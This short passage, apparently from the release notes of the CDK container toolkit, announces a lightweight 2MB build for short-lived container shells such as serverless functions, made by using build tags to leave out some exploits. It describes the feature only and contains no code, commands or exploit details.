    In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in source code and cut a few exploits to make the binary lighter, just a 2MB file, but contains 90% of CDK functions, you may also pick up useful exploits in our CDK source code to build your own lightweight binary.
